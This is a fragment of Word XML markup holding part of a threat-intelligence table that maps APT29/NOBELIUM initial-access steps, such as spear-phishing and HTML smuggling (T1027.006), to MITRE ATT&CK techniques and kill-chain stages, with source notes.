              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB09CF5" w14:textId="207FE717" w:rsidR="00F80381" w:rsidRDefault="006F2362" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0182416B" w14:textId="74ED11EE" w:rsidR="00F80381" w:rsidRDefault="00D1186A" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6] Wave 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FF105CD" w14:textId="77777777" w:rsidR="00F80381" w:rsidRPr="00AC7A85" w:rsidRDefault="00F80381" w:rsidP="00F80381"/>
    <w:p w14:paraId="2C7853BA" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="00F80381">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10201" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1958"/>
        <w:gridCol w:w="2463"/>
        <w:gridCol w:w="663"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="684"/>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="2409"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F3C19" w:rsidRPr="002D1D50" w14:paraId="21B9830A" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1F30E0A3" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="31268D6E" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2F0C81FD" w14:textId="49754407" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00235021">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0DE39643" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7B5342E0" w14:textId="461E524B" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5120EA38" w14:textId="1447E86E" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6F084986" w14:textId="7F4D3CC2" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2BF99AEF" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w14:paraId="2D9179A7" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64E4E3A8" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BFE99BF" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="315CF593" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5645E34A" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22E84A01" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128FFBC9" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="522D7462" w14:textId="35622E1E" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34D6C006" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w14:paraId="60ACCE5A" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F4BC7B" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07EF9919" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DD10277" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2658536B" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E767BD" w14:textId="5E7FCAFA" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F0989B8" w14:textId="039D3A48" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2584EE97" w14:textId="7DDCE9FD" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77C1CB9A" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="002D1D50" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w14:paraId="7D729E77" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="607532D4" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B2BCA95" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A076842" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7937734E" w14:textId="1A958736" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00CD088D" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="241254CA" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE68E03" w14:textId="41D18179" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F4F748A" w14:textId="11EB662B" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00F57E37" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0636C00E" w14:textId="02990141" w:rsidR="000C0ACD" w:rsidRPr="008D6D8A" w:rsidRDefault="00CD088D" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D6D8A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
            <w:r w:rsidR="00782F25">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00782F25" w:rsidRPr="0096445D">
              <w:t>In the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015702A" w:rsidRPr="00B857D7" w14:paraId="3FEB59FA" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FFA4030" w14:textId="77423925" w:rsidR="0015702A" w:rsidRDefault="0015702A" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E7D5FBB" w14:textId="4FE22976" w:rsidR="0015702A" w:rsidRPr="00B857D7" w:rsidRDefault="0015702A" w:rsidP="000C0ACD">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w:t>
            </w:r>
            <w:r w:rsidR="002F0F12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">05 </w:t>
            </w:r>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00150521">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ACE7128" w14:textId="7EF80F92" w:rsidR="0015702A" w:rsidRPr="00B857D7" w:rsidRDefault="0015702A" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0015702A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1027.006 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0015702A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:HTML Smuggling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD7FEC6" w14:textId="283B2911" w:rsidR="0015702A" w:rsidRDefault="0015702A" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5555B37E" w14:textId="77777777" w:rsidR="0015702A" w:rsidRPr="00B857D7" w:rsidRDefault="0015702A" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53D3C024" w14:textId="0D7A4F26" w:rsidR="0015702A" w:rsidRDefault="0015702A" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D7EF6F9" w14:textId="6C1B8821" w:rsidR="0015702A" w:rsidRDefault="0015702A" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
